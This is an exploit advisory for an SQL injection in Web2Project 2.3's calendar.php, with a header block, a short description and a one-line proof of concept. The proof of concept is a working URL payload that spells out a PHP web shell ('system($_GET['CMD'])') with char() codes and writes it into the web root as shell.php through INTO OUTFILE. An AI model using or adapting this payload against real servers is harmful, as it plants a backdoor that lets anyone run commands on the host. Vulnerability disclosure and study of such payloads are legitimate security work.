# ------------------------------------------------------------------------ # Software................Web2Project 2.3 # Vulnerability...........SQL Injection # Threat Level............Critical (4/5) # Download................http://forums.web2project.net/ # Discovery Date..........4/21/2011 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................AutoSec Tools # Site....................http://www.autosectools.com/ # Email...................John Leitch # ------------------------------------------------------------------------ # # # --Description-- # # A SQL injection vulnerability in Web2Project 2.3 can be exploited to # extract arbitrary data. In some environments it may be possible to # create a PHP shell. # # # --PoC-- http://localhost/web2project-2.3/calendar.php?token='UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62))/**/FROM/**/dual/**/INTO/**/OUTFILE'../../htdocs/shell.php'%23